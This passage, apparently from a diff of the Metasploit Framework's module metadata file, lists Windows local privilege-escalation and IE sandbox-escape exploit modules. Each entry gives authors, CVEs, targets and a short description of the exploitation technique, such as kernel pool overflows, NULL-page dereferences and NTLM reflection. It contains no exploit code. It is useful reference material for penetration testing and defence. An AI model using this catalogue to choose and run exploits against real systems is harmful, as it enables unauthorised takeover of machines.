execute the final\n payload in order to gain remote code execution.", - "references": [ - "CVE-2018-8897", - "EDB-44697", - "BID-104071", - "URL-https://github.com/can1357/CVE-2018-8897/", - "URL-https://blog.can.ac/2018/05/11/arbitrary-code-execution-at-ring-0-using-cve-2018-8897/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows x64" - ], - "mod_time": "2023-05-25 12:45:30 +0000", - "path": "/modules/exploits/windows/local/mov_ss.rb", - "is_install_path": true, - "ref_name": "windows/local/mov_ss", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/mqac_write": { - "name": "MQAC.sys Arbitrary Write Privilege Escalation", - "fullname": "exploit/windows/local/mqac_write", - "aliases": [], - "rank": 200, - "disclosure_date": "2014-07-22", - "type": "exploit", - "author": [ - "Matt Bergin", - "Spencer McIntyre" - ], - "description": "A vulnerability within the MQAC.sys module allows an attacker to\n overwrite an arbitrary location in kernel memory.\n\n This module will elevate itself to SYSTEM, then inject the payload\n into another SYSTEM process.", - "references": [ - "CVE-2014-4971", - "EDB-34112", - "URL-https://www.korelogic.com/Resources/Advisories/KL-001-2014-003.txt" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP3" - ], - "mod_time": "2023-05-25 12:45:30 +0000", - "path": "/modules/exploits/windows/local/mqac_write.rb", - "is_install_path": true, - "ref_name": "windows/local/mqac_write", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-os-restarts" - ] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - 
"exploit_windows/local/ms10_015_kitrap0d": { - "name": "Windows SYSTEM Escalation via KiTrap0D", - "fullname": "exploit/windows/local/ms10_015_kitrap0d", - "aliases": [], - "rank": 500, - "disclosure_date": "2010-01-19", - "type": "exploit", - "author": [ - "Tavis Ormandy", - "HD Moore", - "Pusscat", - "OJ Reeves" - ], - "description": "This module will create a new session with SYSTEM privileges via the\n KiTrap0D exploit by Tavis Ormandy. If the session in use is already\n elevated then the exploit will not run. The module relies on kitrap0d.x86.dll,\n and is not supported on x64 editions of Windows.", - "references": [ - "CVE-2010-0232", - "OSVDB-61854", - "MSB-MS10-015", - "EDB-11199", - "URL-https://seclists.org/fulldisclosure/2010/Jan/341" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 2K SP4 - Windows 7 (x86)" - ], - "mod_time": "2023-05-25 12:45:30 +0000", - "path": "/modules/exploits/windows/local/ms10_015_kitrap0d.rb", - "is_install_path": true, - "ref_name": "windows/local/ms10_015_kitrap0d", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/ms10_092_schelevator": { - "name": "Windows Escalate Task Scheduler XML Privilege Escalation", - "fullname": "exploit/windows/local/ms10_092_schelevator", - "aliases": [], - "rank": 600, - "disclosure_date": "2010-09-13", - "type": "exploit", - "author": [ - "jduck " - ], - "description": "This module exploits the Task Scheduler 2.0 XML 0day exploited by Stuxnet.\n When processing task files, the Windows Task Scheduler only uses a CRC32\n checksum to validate that the file has not been tampered with. Also, In a default\n configuration, normal users can read and write the task files that they have\n created. 
By modifying the task file and creating a CRC32 collision, an attacker\n can execute arbitrary commands with SYSTEM privileges.\n\n NOTE: Thanks to webDEViL for the information about disable/enable.", - "references": [ - "OSVDB-68518", - "CVE-2010-3338", - "BID-44357", - "MSB-MS10-092", - "EDB-15589" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows Vista / 7 / 2008 (Dropper)", - "Windows Vista / 7 / 2008 (Command)" - ], - "mod_time": "2022-08-19 15:19:28 +0000", - "path": "/modules/exploits/windows/local/ms10_092_schelevator.rb", - "is_install_path": true, - "ref_name": "windows/local/ms10_092_schelevator", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "ioc-in-logs", - "artifacts-on-disk" - ] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/ms11_080_afdjoinleaf": { - "name": "MS11-080 AfdJoinLeaf Privilege Escalation", - "fullname": "exploit/windows/local/ms11_080_afdjoinleaf", - "aliases": [], - "rank": 200, - "disclosure_date": "2011-11-30", - "type": "exploit", - "author": [ - "Matteo Memelli", - "Spencer McIntyre" - ], - "description": "This module exploits a flaw in the AfdJoinLeaf function of the\n afd.sys driver to overwrite data in kernel space. 
An address\n within the HalDispatchTable is overwritten and when triggered\n with a call to NtQueryIntervalProfile will execute shellcode.\n\n This module will elevate itself to SYSTEM, then inject the payload\n into another SYSTEM process before restoring its own token to\n avoid causing system instability.", - "references": [ - "CVE-2011-2005", - "OSVDB-76232", - "EDB-18176", - "MSB-MS11-080", - "URL-http://www.offensive-security.com/vulndev/ms11-080-voyage-into-ring-zero/" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "Windows XP SP2 / SP3", - "Windows Server 2003 SP2" - ], - "mod_time": "2023-05-25 12:45:30 +0000", - "path": "/modules/exploits/windows/local/ms11_080_afdjoinleaf.rb", - "is_install_path": true, - "ref_name": "windows/local/ms11_080_afdjoinleaf", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-os-restarts" - ], - "Reliability": [], - "SideEffects": [ - "ioc-in-logs", - "artifacts-on-disk" - ] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/ms13_005_hwnd_broadcast": { - "name": "MS13-005 HWND_BROADCAST Low to Medium Integrity Privilege Escalation", - "fullname": "exploit/windows/local/ms13_005_hwnd_broadcast", - "aliases": [], - "rank": 600, - "disclosure_date": "2012-11-27", - "type": "exploit", - "author": [ - "Tavis Ormandy", - "Axel Souchet", - "Ben Campbell " - ], - "description": "Due to a problem with isolating window broadcast messages in the Windows kernel,\n an attacker can broadcast commands from a lower Integrity Level process to a\n higher Integrity Level process, thereby effecting a privilege escalation. This\n issue affects Windows Vista, 7, 8, Server 2008, Server 2008 R2, Server 2012, and\n RT. 
Note that spawning a command prompt with the shortcut key combination Win+Shift+#\n does not work in Vista, so the attacker will have to check if the user is already\n running a command prompt and set SPAWN_PROMPT false.\n\n Three exploit techniques are available with this module. The WEB technique will\n execute a powershell encoded payload from a Web location. The FILE technique\n will drop an executable to the file system, set it to medium integrity and execute\n it. The TYPE technique will attempt to execute a powershell encoded payload directly\n from the command line, but may take some time to complete.", - "references": [ - "CVE-2013-0008", - "MSB-MS13-005", - "OSVDB-88966", - "URL-http://blog.cmpxchg8b.com/2013/02/a-few-years-ago-while-working-on.html" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows x86", - "Windows x64" - ], - "mod_time": "2021-09-08 21:56:02 +0000", - "path": "/modules/exploits/windows/local/ms13_005_hwnd_broadcast.rb", - "is_install_path": true, - "ref_name": "windows/local/ms13_005_hwnd_broadcast", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": true, - "actions": [] - }, - "exploit_windows/local/ms13_053_schlamperei": { - "name": "Windows NTUserMessageCall Win32k Kernel Pool Overflow (Schlamperei)", - "fullname": "exploit/windows/local/ms13_053_schlamperei", - "aliases": [], - "rank": 200, - "disclosure_date": "2013-12-01", - "type": "exploit", - "author": [ - "Nils", - "Jon", - "Donato Capitella ", - "Ben Campbell " - ], - "description": "This module leverages a kernel pool overflow in Win32k which allows local privilege escalation.\n The kernel shellcode nulls the ACL for the winlogon.exe process (a SYSTEM process).\n This allows any unprivileged process to freely migrate to winlogon.exe, achieving\n privilege escalation. 
This exploit was used in pwn2own 2013 by MWR to break out of chrome's sandbox.\n NOTE: when a meterpreter session started by this exploit exits, winlogin.exe is likely to crash.", - "references": [ - "CVE-2013-1300", - "MSB-MS13-053", - "URL-https://labs.mwrinfosecurity.com/blog/2013/09/06/mwr-labs-pwn2own-2013-write-up---kernel-exploit/" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 7 SP0/SP1" - ], - "mod_time": "2023-05-25 12:45:30 +0000", - "path": "/modules/exploits/windows/local/ms13_053_schlamperei.rb", - "is_install_path": true, - "ref_name": "windows/local/ms13_053_schlamperei", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/ms13_081_track_popup_menu": { - "name": "Windows TrackPopupMenuEx Win32k NULL Page", - "fullname": "exploit/windows/local/ms13_081_track_popup_menu", - "aliases": [], - "rank": 200, - "disclosure_date": "2013-10-08", - "type": "exploit", - "author": [ - "Seth Gibson", - "Dan Zentner", - "Matias Soler", - "Spencer McIntyre" - ], - "description": "This module exploits a vulnerability in win32k.sys where under\n specific conditions TrackPopupMenuEx will pass a NULL pointer to\n the MNEndMenuState procedure. 
This module has been tested\n successfully on Windows 7 SP0 and Windows 7 SP1.", - "references": [ - "CVE-2013-3881", - "OSVDB-98212", - "BID-62830", - "MSB-MS13-081", - "URL-http://endgame.com/news/microsoft-win32k-null-page-vulnerability-technical-analysis.html", - "URL-http://immunityproducts.blogspot.com/2013/11/exploiting-cve-2013-3881-win32k-null.html" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 7 SP0/SP1" - ], - "mod_time": "2023-05-25 12:45:30 +0000", - "path": "/modules/exploits/windows/local/ms13_081_track_popup_menu.rb", - "is_install_path": true, - "ref_name": "windows/local/ms13_081_track_popup_menu", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-os-restarts" - ] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/ms13_097_ie_registry_symlink": { - "name": "MS13-097 Registry Symlink IE Sandbox Escape", - "fullname": "exploit/windows/local/ms13_097_ie_registry_symlink", - "aliases": [], - "rank": 500, - "disclosure_date": "2013-12-10", - "type": "exploit", - "author": [ - "James Forshaw", - "juan vazquez " - ], - "description": "This module exploits a vulnerability in Internet Explorer Sandbox which allows to\n escape the Enhanced Protected Mode and execute code with Medium Integrity. 
The\n vulnerability exists in the IESetProtectedModeRegKeyOnly function from the ieframe.dll\n component, which can be abused to force medium integrity IE to user influenced keys.\n By using registry symlinks it's possible force IE to add a policy entry in the registry\n and finally bypass Enhanced Protected Mode.", - "references": [ - "CVE-2013-5045", - "MSB-MS13-097", - "BID-64115", - "URL-https://github.com/tyranid/IE11SandboxEscapes" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "IE 8 - 11" - ], - "mod_time": "2021-09-08 21:56:02 +0000", - "path": "/modules/exploits/windows/local/ms13_097_ie_registry_symlink.rb", - "is_install_path": true, - "ref_name": "windows/local/ms13_097_ie_registry_symlink", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/ms14_009_ie_dfsvc": { - "name": "MS14-009 .NET Deployment Service IE Sandbox Escape", - "fullname": "exploit/windows/local/ms14_009_ie_dfsvc", - "aliases": [], - "rank": 500, - "disclosure_date": "2014-02-11", - "type": "exploit", - "author": [ - "James Forshaw", - "juan vazquez " - ], - "description": "This module abuses a process creation policy in Internet Explorer's sandbox, specifically\n in the .NET Deployment Service (dfsvc.exe), which allows the attacker to escape the\n Enhanced Protected Mode, and execute code with Medium Integrity.", - "references": [ - "CVE-2014-0257", - "MSB-MS14-009", - "BID-65417", - "URL-https://github.com/tyranid/IE11SandboxEscapes" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "IE 8 - 11" - ], - "mod_time": "2021-09-08 21:56:02 +0000", - "path": "/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb", - "is_install_path": true, - "ref_name": 
"windows/local/ms14_009_ie_dfsvc", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/ms14_058_track_popup_menu": { - "name": "Windows TrackPopupMenu Win32k NULL Pointer Dereference", - "fullname": "exploit/windows/local/ms14_058_track_popup_menu", - "aliases": [], - "rank": 300, - "disclosure_date": "2014-10-14", - "type": "exploit", - "author": [ - "Unknown", - "juan vazquez ", - "Spencer McIntyre", - "OJ Reeves " - ], - "description": "This module exploits a NULL Pointer Dereference in win32k.sys, the vulnerability\n can be triggered through the use of TrackPopupMenu. Under special conditions, the\n NULL pointer dereference can be abused on xxxSendMessageTimeout to achieve arbitrary\n code execution. This module has been tested successfully on Windows XP SP3, Windows\n 2003 SP2, Windows 7 SP1 and Windows 2008 32bits. Also on Windows 7 SP1 and Windows\n 2008 R2 SP1 64 bits.", - "references": [ - "CVE-2014-4113", - "OSVDB-113167", - "BID-70364", - "MSB-MS14-058", - "URL-http://blog.trendmicro.com/trendlabs-security-intelligence/an-analysis-of-a-windows-kernel-mode-vulnerability-cve-2014-4113/" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows x86", - "Windows x64" - ], - "mod_time": "2023-05-25 12:45:30 +0000", - "path": "/modules/exploits/windows/local/ms14_058_track_popup_menu.rb", - "is_install_path": true, - "ref_name": "windows/local/ms14_058_track_popup_menu", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-os-restarts" - ] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/ms14_070_tcpip_ioctl": { - "name": "MS14-070 Windows tcpip!SetAddrOptions NULL Pointer Dereference", - "fullname": 
"exploit/windows/local/ms14_070_tcpip_ioctl", - "aliases": [], - "rank": 200, - "disclosure_date": "2014-11-11", - "type": "exploit", - "author": [ - "Matt Bergin ", - "Jay Smith " - ], - "description": "A vulnerability within the Microsoft TCP/IP protocol driver tcpip.sys\n can allow a local attacker to trigger a NULL pointer dereference by using a\n specially crafted IOCTL. This flaw can be abused to elevate privileges to\n SYSTEM.", - "references": [ - "CVE-2014-4076", - "MSB-MS14-070", - "OSVDB-114532", - "URL-https://blog.korelogic.com/blog/2015/01/28/2k3_tcpip_setaddroptions_exploit_dev", - "URL-https://www.korelogic.com/Resources/Advisories/KL-001-2015-001.txt" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows Server 2003 SP2" - ], - "mod_time": "2021-09-08 21:56:02 +0000", - "path": "/modules/exploits/windows/local/ms14_070_tcpip_ioctl.rb", - "is_install_path": true, - "ref_name": "windows/local/ms14_070_tcpip_ioctl", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/ms15_004_tswbproxy": { - "name": "MS15-004 Microsoft Remote Desktop Services Web Proxy IE Sandbox Escape", - "fullname": "exploit/windows/local/ms15_004_tswbproxy", - "aliases": [], - "rank": 400, - "disclosure_date": "2015-01-13", - "type": "exploit", - "author": [ - "Unknown", - "Henry Li", - "juan vazquez " - ], - "description": "This module abuses a process creation policy in Internet Explorer's\n sandbox; specifically, Microsoft's RemoteApp and Desktop Connections runtime\n proxy, TSWbPrxy.exe. This vulnerability allows the attacker to escape the\n Protected Mode and execute code with Medium Integrity. At the moment, this\n module only bypass Protected Mode on Windows 7 SP1 and prior (32 bits). 
This\n module has been tested successfully on Windows 7 SP1 (32 bits) with IE 8 and IE\n 11.", - "references": [ - "CVE-2015-0016", - "MSB-MS15-004", - "URL-http://blog.trendmicro.com/trendlabs-security-intelligence/cve-2015-0016-escaping-the-internet-explorer-sandbox/" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Protected Mode (Windows 7) / 32 bits" - ], - "mod_time": "2023-05-25 12:45:30 +0000", - "path": "/modules/exploits/windows/local/ms15_004_tswbproxy.rb", - "is_install_path": true, - "ref_name": "windows/local/ms15_004_tswbproxy", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/ms15_051_client_copy_image": { - "name": "Windows ClientCopyImage Win32k Exploit", - "fullname": "exploit/windows/local/ms15_051_client_copy_image", - "aliases": [], - "rank": 300, - "disclosure_date": "2015-05-12", - "type": "exploit", - "author": [ - "Unknown", - "hfirefox", - "OJ Reeves", - "Spencer McIntyre" - ], - "description": "This module exploits improper object handling in the win32k.sys kernel mode driver.\n This module has been tested on vulnerable builds of Windows 7 x64 and x86, and\n Windows 2008 R2 SP1 x64.", - "references": [ - "CVE-2015-1701", - "MSB-MS15-051", - "URL-https://www.fireeye.com/blog/threat-research/2015/04/probable_apt28_useo.html", - "URL-https://github.com/hfiref0x/CVE-2015-1701", - "URL-https://technet.microsoft.com/library/security/MS15-051" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows x86", - "Windows x64" - ], - "mod_time": "2023-05-25 12:45:30 +0000", - "path": "/modules/exploits/windows/local/ms15_051_client_copy_image.rb", - "is_install_path": true, - "ref_name": 
"windows/local/ms15_051_client_copy_image", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-os-restarts" - ] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/ms15_078_atmfd_bof": { - "name": "MS15-078 Microsoft Windows Font Driver Buffer Overflow", - "fullname": "exploit/windows/local/ms15_078_atmfd_bof", - "aliases": [], - "rank": 0, - "disclosure_date": "2015-07-11", - "type": "exploit", - "author": [ - "Eugene Ching", - "Mateusz Jurczyk", - "Cedric Halbronn", - "juan vazquez " - ], - "description": "This module exploits a pool based buffer overflow in the atmfd.dll driver when parsing\n a malformed font. The vulnerability was exploited by the hacking team and disclosed in\n the July data leak. This module has been tested successfully on vulnerable builds of\n Windows 8.1 x64.", - "references": [ - "CVE-2015-2426", - "CVE-2015-2433", - "MSB-MS15-078", - "MSB-MS15-080", - "URL-https://github.com/vlad902/hacking-team-windows-kernel-lpe", - "URL-https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2015/september/exploiting-cve-2015-2426-and-how-i-ported-it-to-a-recent-windows-8.1-64-bit/", - "URL-https://code.google.com/p/google-security-research/issues/detail?id=369", - "URL-https://code.google.com/p/google-security-research/issues/detail?id=480" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 8.1 x64" - ], - "mod_time": "2023-10-12 17:33:58 +0000", - "path": "/modules/exploits/windows/local/ms15_078_atmfd_bof.rb", - "is_install_path": true, - "ref_name": "windows/local/ms15_078_atmfd_bof", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/ms16_014_wmi_recv_notif": { - "name": "Windows 
WMI Receive Notification Exploit", - "fullname": "exploit/windows/local/ms16_014_wmi_recv_notif", - "aliases": [], - "rank": 300, - "disclosure_date": "2015-12-04", - "type": "exploit", - "author": [ - "smmrootkit", - "de7ec7ed", - "de7ec7ed" - ], - "description": "This module exploits an uninitialized stack variable in the WMI subsystem of ntoskrnl.\n This module has been tested on vulnerable builds of Windows 7 SP0 x64 and Windows 7 SP1 x64.", - "references": [ - "CVE-2016-0040", - "MSB-MS16-014", - "URL-https://github.com/de7ec7ed/CVE-2016-0040", - "URL-https://github.com/Rootkitsmm/cve-2016-0040", - "URL-https://technet.microsoft.com/en-us/library/security/ms16-014.aspx" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 7 SP0/SP1" - ], - "mod_time": "2023-05-25 12:45:30 +0000", - "path": "/modules/exploits/windows/local/ms16_014_wmi_recv_notif.rb", - "is_install_path": true, - "ref_name": "windows/local/ms16_014_wmi_recv_notif", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/ms16_016_webdav": { - "name": "MS16-016 mrxdav.sys WebDav Local Privilege Escalation", - "fullname": "exploit/windows/local/ms16_016_webdav", - "aliases": [], - "rank": 600, - "disclosure_date": "2016-02-09", - "type": "exploit", - "author": [ - "Tamas Koczka", - "William Webb " - ], - "description": "This module exploits the vulnerability in mrxdav.sys described by MS16-016. 
The module will spawn\n a process on the target system and elevate its privileges to NT AUTHORITY\\SYSTEM before executing\n the specified payload within the context of the elevated process.", - "references": [ - "CVE-2016-0051", - "MSB-MS16-016" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 7 SP1" - ], - "mod_time": "2021-07-21 12:35:47 +0000", - "path": "/modules/exploits/windows/local/ms16_016_webdav.rb", - "is_install_path": true, - "ref_name": "windows/local/ms16_016_webdav", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/ms16_032_secondary_logon_handle_privesc": { - "name": "MS16-032 Secondary Logon Handle Privilege Escalation", - "fullname": "exploit/windows/local/ms16_032_secondary_logon_handle_privesc", - "aliases": [], - "rank": 300, - "disclosure_date": "2016-03-21", - "type": "exploit", - "author": [ - "James Forshaw", - "b33f", - "khr0x40sh" - ], - "description": "This module exploits the lack of sanitization of standard handles in Windows' Secondary\n Logon Service. The vulnerability is known to affect versions of Windows 7-10 and 2k8-2k12\n 32 and 64 bit. 
This module will only work against those versions of Windows with\n Powershell 2.0 or later and systems with two or more CPU cores.", - "references": [ - "MSB-MS16-032", - "CVE-2016-0099", - "URL-https://twitter.com/FuzzySec/status/723254004042612736", - "URL-https://googleprojectzero.blogspot.co.uk/2016/03/exploiting-leaked-thread-handle.html" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows x86", - "Windows x64" - ], - "mod_time": "2023-05-25 12:45:30 +0000", - "path": "/modules/exploits/windows/local/ms16_032_secondary_logon_handle_privesc.rb", - "is_install_path": true, - "ref_name": "windows/local/ms16_032_secondary_logon_handle_privesc", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/ms16_075_reflection": { - "name": "Windows Net-NTLMv2 Reflection DCOM/RPC", - "fullname": "exploit/windows/local/ms16_075_reflection", - "aliases": [], - "rank": 300, - "disclosure_date": "2016-01-16", - "type": "exploit", - "author": [ - "FoxGloveSec", - "breenmachine", - "Mumbai" - ], - "description": "Module utilizes the Net-NTLMv2 reflection between DCOM/RPC\n to achieve a SYSTEM handle for elevation of privilege. 
Currently the module\n does not spawn as SYSTEM, however once achieving a shell, one can easily\n use incognito to impersonate the token.", - "references": [ - "MSB-MS16-075", - "CVE-2016-3225", - "URL-http://blog.trendmicro.com/trendlabs-security-intelligence/an-analysis-of-a-windows-kernel-mode-vulnerability-cve-2014-4113/", - "URL-https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/", - "URL-https://github.com/breenmachine/RottenPotatoNG" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "Windows x86", - "Windows x64" - ], - "mod_time": "2021-09-08 21:56:02 +0000", - "path": "/modules/exploits/windows/local/ms16_075_reflection.rb", - "is_install_path": true, - "ref_name": "windows/local/ms16_075_reflection", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/ms16_075_reflection_juicy": { - "name": "Windows Net-NTLMv2 Reflection DCOM/RPC (Juicy)", - "fullname": "exploit/windows/local/ms16_075_reflection_juicy", - "aliases": [], - "rank": 500, - "disclosure_date": "2016-01-16", - "type": "exploit", - "author": [ - "FoxGloveSec", - "breenmachine", - "decoder", - "ohpe", - "phra", - "lupman" - ], - "description": "This module utilizes the Net-NTLMv2 reflection between DCOM/RPC\n to achieve a SYSTEM handle for elevation of privilege.\n It requires a CLSID string.\n Windows 10 after version 1803, (April 2018 update, build 17134) and all\n versions of Windows Server 2019 are not vulnerable.", - "references": [ - "MSB-MS16-075", - "CVE-2016-3225", - "URL-http://blog.trendmicro.com/trendlabs-security-intelligence/an-analysis-of-a-windows-kernel-mode-vulnerability-cve-2014-4113/", - 
"URL-https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/", - "URL-https://github.com/breenmachine/RottenPotatoNG", - "URL-https://decoder.cloud/2017/12/23/the-lonely-potato/", - "URL-https://ohpe.it/juicy-potato/" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2023-05-25 12:45:30 +0000", - "path": "/modules/exploits/windows/local/ms16_075_reflection_juicy.rb", - "is_install_path": true, - "ref_name": "windows/local/ms16_075_reflection_juicy", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/ms18_8120_win32k_privesc": { - "name": "Windows SetImeInfoEx Win32k NULL Pointer Dereference", - "fullname": "exploit/windows/local/ms18_8120_win32k_privesc", - "aliases": [], - "rank": 400, - "disclosure_date": "2018-05-09", - "type": "exploit", - "author": [ - "unamer", - "bigric3", - "Anton Cherepanov", - "Dhiraj Mishra " - ], - "description": "This module exploits elevation of privilege vulnerability that exists in Windows 7 and 2008 R2\n when the Win32k component fails to properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run arbitrary code in kernel mode. 
An\n attacker could then install programs; view, change, or delete data; or create new\n accounts with full user rights.\n\n This module is tested against windows 7 x86, windows 7 x64 and windows server 2008 R2 standard x64.", - "references": [ - "BID-104034", - "CVE-2018-8120", - "URL-https://github.com/unamer/CVE-2018-8120", - "URL-https://github.com/bigric3/cve-2018-8120", - "URL-http://bigric3.blogspot.com/2018/05/cve-2018-8120-analysis-and-exploit.html", - "URL-https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8120" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "Windows 7 x64", - "Windows 7 x86" - ], - "mod_time": "2023-05-25 12:45:30 +0000", - "path": "/modules/exploits/windows/local/ms18_8120_win32k_privesc.rb", - "is_install_path": true, - "ref_name": "windows/local/ms18_8120_win32k_privesc", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": true, - "actions": [] - }, - "exploit_windows/local/ms_ndproxy": { - "name": "MS14-002 Microsoft Windows ndproxy.sys Local Privilege Escalation", - "fullname": "exploit/windows/local/ms_ndproxy", - "aliases": [], - "rank": 200, - "disclosure_date": "2013-11-27", - "type": "exploit", - "author": [ - "Unknown", - "ryujin", - "Shahin Ramezany", - "juan vazquez " - ], - "description": "This module exploits a flaw in the ndproxy.sys driver on Windows XP SP3 and Windows 2003\n SP2 systems, exploited in the wild in November, 2013. The vulnerability exists while\n processing an IO Control Code 0x8fff23c8 or 0x8fff23cc, where user provided input is used\n to access an array unsafely, and the value is used to perform a call, leading to a NULL\n pointer dereference which is exploitable on both Windows XP and Windows 2003 systems. 
This\n module has been tested successfully on Windows XP SP3 and Windows 2003 SP2. In order to\n work the service \"Routing and Remote Access\" must be running on the target system.", - "references": [ - "CVE-2013-5065", - "MSB-MS14-002", - "OSVDB-100368", - "BID-63971", - "EDB-30014", - "URL-http://labs.portcullis.co.uk/blog/cve-2013-5065-ndproxy-array-indexing-error-unpatched-vulnerability/", - "URL-http://technet.microsoft.com/en-us/security/advisory/2914486", - "URL-http://www.secniu.com/blog/?p=53", - "URL-http://www.fireeye.com/blog/technical/cyber-exploits/2013/11/ms-windows-local-privilege-escalation-zero-day-in-the-wild.html", - "URL-http://blog.spiderlabs.com/2013/12/the-kernel-is-calling-a-zeroday-pointer-cve-2013-5065-ring-ring.html" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "Windows XP SP3", - "Windows Server 2003 SP2" - ], - "mod_time": "2023-05-25 12:45:30 +0000", - "path": "/modules/exploits/windows/local/ms_ndproxy.rb", - "is_install_path": true, - "ref_name": "windows/local/ms_ndproxy", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - 